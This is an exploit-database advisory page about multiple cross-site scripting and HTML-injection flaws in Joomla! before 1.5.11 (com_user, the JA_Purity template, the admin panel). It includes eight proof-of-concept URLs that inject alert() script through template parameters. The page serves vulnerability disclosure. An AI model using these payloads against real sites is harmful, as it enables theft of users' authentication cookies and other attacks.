header-logo
Suggest Exploit
vendor:
Joomla!
by:
SecurityFocus
7.5
CVSS
HIGH
Cross-Site Scripting and HTML-Injection
79
CWE
Product Name: Joomla!
Affected Version From: Joomla!1.5.11
Affected Version To: Prior versions
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Multiple Cross-Site Scripting and HTML-Injection Vulnerabilities in Joomla!

Joomla! is prone to multiple cross-site scripting and HTML-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues affect the 'com_user' component, the 'JA_Purity' template, and the administrative panel in the 'Site client' subproject of the application. An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Input validation should be used to ensure that user-supplied data does not include malicious HTML or script code.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/35189/info


Joomla! is prone to multiple cross-site scripting and HTML-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues affect the 'com_user' component, the 'JA_Purity' template, and the administrative panel in the 'Site client' subproject of the application.

An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.

Versions prior to Joomla!1.5.11 are vulnerable. 

http://www.example.com/path/?theme_header=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
http://www.example.com/path/?theme_background=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
http://www.example.com/path/?theme_elements=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
http://www.example.com/path/?logoType=1&logoText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
http://www.example.com/path/?logoType=1&sloganText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
http://www.example.com/path/?excludeModules=%27;alert(8);%20var%20b=%27
http://www.example.com/path/?rightCollapseDefault=%27;alert(8);%20var%20b=%27
http://www.example.com/path/?ja_font=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E

Navigation

Suggest Exploit

Services By CQR